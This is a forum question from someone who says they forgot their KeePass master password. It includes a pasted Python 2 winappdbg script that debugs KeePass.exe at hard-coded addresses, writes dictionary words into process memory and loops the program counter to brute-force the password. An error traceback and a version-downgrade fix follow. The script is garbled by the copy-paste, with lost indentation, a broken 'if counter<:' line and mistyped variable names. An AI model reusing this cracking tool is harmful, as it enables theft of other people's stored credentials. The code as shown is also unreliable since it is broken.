So i have forgotten my master password ~_~ i was storing all my passwords in a KeePass database file. Now i have found this article http://blog.q-protex.com/2010/03/14/keepass-self-bruteforce/ and installed the reqired version of python and winappdbg-1.3.win32 . I have modified the source code so it will look like this :
from winappdbg import Debug
from time import strftime
import time
import os.path
counter=0
word=""
words=[]
r_eax=0
r_ecx=0
r_edx=0
WORD_SIZE = 20
#Save the state of the registers
def action_0(event):
global r_eax, r_ecx, r_rdx
aThread = event.get_thread()
r_eax = aThread.get_register("Eax")
r_ecx = aThread.get_register("Ecx")
r_edx = aThread.get_register("Edx")
#Write the word
def action_1( event ):
global word
global words
global counter
global WORD_SIZE
aThread = event.get_thread()
aProcess = event.get_process()
memDir = aThread.get_register("Ecx")
word=words[counter]
word = word.replace("\n","")
word = word[0:WORD_SIZE-1]
#word = word.lower() #optional
aProcess.poke(memDir,word + "\0")
#Check the flag state
def action_2( event ):
global word
global counter
aThread = event.get_thread()
b = aThread.get_flag_value(aThread.Flags.Zero)
if b:
print 'Counter: ' + repr(counter) + ' - Correct: ' + word
event.get_process().kill()
else:
print 'Counter: ' + repr(counter) + ' - Incorrect: ' + word
if counter<:
len(words)-1
counter+=1
aThread.set_register("Eip", 0x004D6699)
else:
event.get_process().kill()
#Restore the registers to the original state
def action_3( event ):
aThread = event.get_thread()
aThread.set_register("Eax",r_eax)
aThread.set_register("Ecx",r_ecx)
aThread.set_register("Edx",r_edx)
aThread.set_register("Eip", 0x004DC395)
#Specify a dictionary here
words = open('dic.txt', "r").readlines()
print "[+] Words Loaded: ",len(words)
#Specify a key file
keyfile = "dic.txt"
try:
debug = Debug()
if os.path.isfile(keyfile):
print "[+] Keyfile Loaded: '" + keyfile + "'"
aProcess = debug.execv(['KeePass.exe', 'db.kdb', '-keyfile:' + keyfile, '-pw:'.ljust(WORD_SIZE+4)])
else:
print "[+] Specified keyfile '" + keyfile + "' does not exist, ignoring argument"
aProcess = debug.execv( ['KeePass.exe', 'db.kdb', '-pw:'.ljust(WORD_SIZE+4)])
#Set the breakpoints
debug.break_at(aProcess.get_pid() , 0x004DC395, action_0)
debug.break_at(aProcess.get_pid() , 0x004D77A0, action_1)
debug.break_at(aProcess.get_pid() , 0x004D6684, action_2)
debug.break_at(aProcess.get_pid() , 0x004DC39A, action_3)
#Wait for the debugee to finish
t1 = time.clock()
debug.loop()
finally:
debug.stop()
print 'Finished in ' + repr(time.clock() - t1) + ' seconds!'
Now when run the script i get the following error :
Python 2.6.4 (r264:75708, Oct 26 2009, 08:23:19) [MSC v.1500 32 bit (Intel)] on win32
Type "copyright", "credits" or "license()" for more information.
****************************************************************
Personal firewall software may warn about the connection IDLE
makes to its subprocess using this computer's internal loopback
interface. This connection is not visible on any external
interface and no data is sent to or received from the Internet.
****************************************************************
IDLE 2.6.4 ==== No Subprocess ====
>>>
[+] Words Loaded: 82740
[+] Keyfile Loaded: 'dic.txt'
Traceback (most recent call last):
File "D:\Keepass Self-Bruteforcer - KDB\Script1.py", line 79, in <module>
debug.break_at(aProcess.get_pid() , 0x004DC395, action_0)
File "D:\Phyton264\lib\site-packages\winappdbg\breakpoint.py", line 3415, in break_at
self.enable_code_breakpoint(pid, address)
File "D:\Phyton264\lib\site-packages\winappdbg\breakpoint.py", line 2453, in enable_code_breakpoint
bp.enable(p, None) # XXX HACK thread is not used
File "D:\Phyton264\lib\site-packages\winappdbg\breakpoint.py", line 860, in enable
self.__set_bp(aProcess)
File "D:\Phyton264\lib\site-packages\winappdbg\breakpoint.py", line 836, in __set_bp
aProcess.mprotect(address, mbi.Protect)
TypeError: mprotect() takes exactly 4 arguments (3 given)
>>>
Before the error appears the KeePass program display 2 warning dialogs ( Both say that the password is wrong ) and then two instances of KeePass.exe get opened.
In the folder were the python script is located i placed the dic.txt, db.kdb and KeePass.exe files. The KeePass.exe was downloaded from portable apps and the version is 1.28
EDIT: download KeePass 1.07 from here: http://sourceforge.net/projects/keepass/files/KeePass%201.x/1.07/KeePass-1.07.zip/download and replace it in the folder. This will solve the error.
But i still face a problem in the source code itself. On the website that hosts the python script no longer have the source code as a downloadable file, but instead only as a embed script on their blog-post. I have tried to format it were i can, but i don't hold any knowledge of python. Now when i ran the script again the same thing happens - two instances of KeePass.exe are getting opened and an Warning message displaying that the password is wrong. I understand that this is an bad source code copy/past result.
